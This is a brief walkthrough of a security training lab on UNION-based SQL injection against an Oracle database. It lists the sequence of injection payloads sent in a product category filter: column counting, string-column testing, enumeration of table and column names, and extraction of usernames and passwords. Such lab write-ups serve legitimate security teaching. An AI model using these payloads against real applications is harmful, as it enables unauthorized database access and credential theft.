Lab objective: Log in as the 'administrator' user.
Lab: SQL injection attack, listing the database contents on Oracle
We know that this lab contains a SQL injection vulnerability in the product category filter
After clicking Gifts category we need to find Tabale name, column number, column name, column type and vulnerable column
- We find 2 column and query is
category=Gifts' ORDER BY 2-- - We find columns are vulnerable and string type and query is
category=-Gifts' UNION SELECT 'A','B' FROM dual-- - Now we find table name by this query
category=-Gifts' UNION SELECT table_name, NULL FROM all_tables--table name isUSERS_PZJWZP(Table name is different for every-time). - Now we will find column name so the query will
category=-Gifts' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name='USERS_PZJWZP'--from this we find 3 columnsEMAIL, PASSWORD_AGAINY, USERNAME_JBQHIM - Now we will find username and password so the query will
category=-Gifts' UNION SELECT USERNAME_JBQHIM, PASSWORD_AGAINY FROM USERS_PZJWZP--
